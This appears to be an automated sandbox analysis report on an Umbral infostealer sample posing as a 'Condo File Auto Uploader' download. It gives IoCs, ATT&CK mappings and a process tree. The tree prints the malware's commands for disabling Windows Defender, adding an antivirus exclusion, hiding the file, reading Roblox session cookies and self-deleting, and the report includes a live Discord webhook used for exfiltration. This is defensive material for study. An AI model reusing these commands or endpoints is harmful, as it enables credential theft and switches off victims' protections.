umbral | hxxps://mega[.]nz/file/PzJyyIha#VNaHZcXyZslIjowHIxHqPJBIE4qtkdh18yqX_r3-oNA

Analysis

max time kernel
87s
max time network
103s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
28-08-2023 23:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/PzJyyIha#VNaHZcXyZslIjowHIxHqPJBIE4qtkdh18yqX_r3-oNA

Score

10^/10

umbral spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1143985649888788613/zoyRIm3l4Jki-ES8lYmfu8w6mv3jqVNkYxd7qjbaR_thgksX7b4V3te02L0FLA-bhujr

Signatures

Detect Umbral payload 8 IoCs

resource	yara_rule
behavioral1/files/0x001000000002324b-174.dat	family_umbral
behavioral1/files/0x001000000002324b-185.dat	family_umbral
behavioral1/files/0x001000000002324b-187.dat	family_umbral
behavioral1/memory/3384-188-0x000001C059310000-0x000001C059350000-memory.dmp	family_umbral
behavioral1/files/0x001000000002324b-205.dat	family_umbral
behavioral1/files/0x001000000002324b-272.dat	family_umbral
behavioral1/files/0x000300000000070b-519.dat	family_umbral
behavioral1/files/0x000300000000070b-520.dat	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Blocklisted process makes network request 2 IoCs

flow	pid	Process
63	3460	powershell.exe
64	3460	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Condo FIle Auto Uploader (1).exe

Executes dropped EXE 4 IoCs

pid	Process
3384	Condo FIle Auto Uploader (1).exe
4680	Condo FIle Auto Uploader (1).exe
4404	Condo FIle Auto Uploader (1).exe
4104	Condo FIle Auto Uploader (1).exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
71	ip-api.com
91	ip-api.com

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2744	wmic.exe
4416	wmic.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000_Classes\Local Settings	msedge.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 346779.crdownload:SmartScreen	msedge.exe
File created	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kMfGd.scr\:SmartScreen:$DATA	Condo FIle Auto Uploader (1).exe
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 368337.crdownload:SmartScreen	msedge.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5060	PING.EXE
1652	PING.EXE

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
5028	msedge.exe
5028	msedge.exe
232	msedge.exe
232	msedge.exe
4708	identity_helper.exe
4708	identity_helper.exe
2424	msedge.exe
2424	msedge.exe
4328	powershell.exe
4328	powershell.exe
4328	powershell.exe
512	powershell.exe
512	powershell.exe
512	powershell.exe
5068	powershell.exe
5068	powershell.exe
5068	powershell.exe
1956	powershell.exe
1956	powershell.exe
1956	powershell.exe
3460	powershell.exe
3460	powershell.exe
3460	powershell.exe
1232	msedge.exe
1232	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	4164	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	4164	AUDIODG.EXE
Token: SeDebugPrivilege	3384	Condo FIle Auto Uploader (1).exe
Token: SeDebugPrivilege	4328	powershell.exe
Token: SeDebugPrivilege	512	powershell.exe
Token: SeDebugPrivilege	5068	powershell.exe
Token: SeDebugPrivilege	1956	powershell.exe
Token: SeIncreaseQuotaPrivilege	5080	wmic.exe
Token: SeSecurityPrivilege	5080	wmic.exe
Token: SeTakeOwnershipPrivilege	5080	wmic.exe
Token: SeLoadDriverPrivilege	5080	wmic.exe
Token: SeSystemProfilePrivilege	5080	wmic.exe
Token: SeSystemtimePrivilege	5080	wmic.exe
Token: SeProfSingleProcessPrivilege	5080	wmic.exe
Token: SeIncBasePriorityPrivilege	5080	wmic.exe
Token: SeCreatePagefilePrivilege	5080	wmic.exe
Token: SeBackupPrivilege	5080	wmic.exe
Token: SeRestorePrivilege	5080	wmic.exe
Token: SeShutdownPrivilege	5080	wmic.exe
Token: SeDebugPrivilege	5080	wmic.exe
Token: SeSystemEnvironmentPrivilege	5080	wmic.exe
Token: SeRemoteShutdownPrivilege	5080	wmic.exe
Token: SeUndockPrivilege	5080	wmic.exe
Token: SeManageVolumePrivilege	5080	wmic.exe
Token: 33	5080	wmic.exe
Token: 34	5080	wmic.exe
Token: 35	5080	wmic.exe
Token: 36	5080	wmic.exe
Token: SeIncreaseQuotaPrivilege	5080	wmic.exe
Token: SeSecurityPrivilege	5080	wmic.exe
Token: SeTakeOwnershipPrivilege	5080	wmic.exe
Token: SeLoadDriverPrivilege	5080	wmic.exe
Token: SeSystemProfilePrivilege	5080	wmic.exe
Token: SeSystemtimePrivilege	5080	wmic.exe
Token: SeProfSingleProcessPrivilege	5080	wmic.exe
Token: SeIncBasePriorityPrivilege	5080	wmic.exe
Token: SeCreatePagefilePrivilege	5080	wmic.exe
Token: SeBackupPrivilege	5080	wmic.exe
Token: SeRestorePrivilege	5080	wmic.exe
Token: SeShutdownPrivilege	5080	wmic.exe
Token: SeDebugPrivilege	5080	wmic.exe
Token: SeSystemEnvironmentPrivilege	5080	wmic.exe
Token: SeRemoteShutdownPrivilege	5080	wmic.exe
Token: SeUndockPrivilege	5080	wmic.exe
Token: SeManageVolumePrivilege	5080	wmic.exe
Token: 33	5080	wmic.exe
Token: 34	5080	wmic.exe
Token: 35	5080	wmic.exe
Token: 36	5080	wmic.exe
Token: SeIncreaseQuotaPrivilege	1692	wmic.exe
Token: SeSecurityPrivilege	1692	wmic.exe
Token: SeTakeOwnershipPrivilege	1692	wmic.exe
Token: SeLoadDriverPrivilege	1692	wmic.exe
Token: SeSystemProfilePrivilege	1692	wmic.exe
Token: SeSystemtimePrivilege	1692	wmic.exe
Token: SeProfSingleProcessPrivilege	1692	wmic.exe
Token: SeIncBasePriorityPrivilege	1692	wmic.exe
Token: SeCreatePagefilePrivilege	1692	wmic.exe
Token: SeBackupPrivilege	1692	wmic.exe
Token: SeRestorePrivilege	1692	wmic.exe
Token: SeShutdownPrivilege	1692	wmic.exe
Token: SeDebugPrivilege	1692	wmic.exe
Token: SeSystemEnvironmentPrivilege	1692	wmic.exe
Token: SeRemoteShutdownPrivilege	1692	wmic.exe

Suspicious use of FindShellTrayWindow 53 IoCs

pid	Process
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe
232	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 232 wrote to memory of 1908	232	msedge.exe	72
PID 232 wrote to memory of 1908	232	msedge.exe	72
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 3540	232	msedge.exe	85
PID 232 wrote to memory of 5028	232	msedge.exe	84
PID 232 wrote to memory of 5028	232	msedge.exe	84
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86
PID 232 wrote to memory of 4488	232	msedge.exe	86

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4868	attrib.exe
1184	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/PzJyyIha#VNaHZcXyZslIjowHIxHqPJBIE4qtkdh18yqX_r3-oNA
1⤵
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:232
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffba16346f8,0x7ffba1634708,0x7ffba1634718
  2⤵
  PID:1908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2264 /prefetch:2
  2⤵
  PID:3540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2640 /prefetch:8
  2⤵
  PID:4488
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
  2⤵
  PID:436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
  2⤵
  PID:516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  PID:4832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:1532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  PID:1220
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6092 /prefetch:8
  2⤵
  PID:5008
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  PID:224
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4708
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4900 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2424
- C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe
  "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  PID:3384
- - C:\Windows\SYSTEM32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
    3⤵
    - Views/modifies file attributes
    PID:4868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5068
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1956
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5080
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1692
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1128
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    PID:3460
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2744
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe" && pause
    3⤵
    PID:2104
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:5060
- C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe
  "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
  2⤵
  - Executes dropped EXE
  PID:4680
- C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe
  "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
  2⤵
  - Executes dropped EXE
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
  2⤵
  PID:2364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
  2⤵
  PID:1816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
  2⤵
  PID:4340
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:4104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6960 /prefetch:1
  2⤵
  PID:1772
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6952 /prefetch:1
  2⤵
  PID:1500
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,3035554967064162716,6654432705744132663,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1264 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1232

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3656

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4868

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4fc 0x308
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4164

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4180

C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe
"C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
1⤵
- Executes dropped EXE
PID:4104
- C:\Windows\SYSTEM32\attrib.exe
  "attrib.exe" +h +s "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe"
  2⤵
  - Views/modifies file attributes
  PID:1184
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe'
  2⤵
  PID:4304
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
  2⤵
  PID:4336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:2888
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
  2⤵
  PID:4304
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" os get Caption
  2⤵
  PID:3120
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" computersystem get totalphysicalmemory
  2⤵
  PID:628
- C:\Windows\System32\Wbem\wmic.exe
  "wmic.exe" csproduct get uuid
  2⤵
  PID:4392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
  2⤵
  PID:4420
- C:\Windows\System32\Wbem\wmic.exe
  "wmic" path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:4416
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\Downloads\Condo FIle Auto Uploader (1).exe" && pause
  2⤵
  PID:4568
- - C:\Windows\system32\PING.EXE
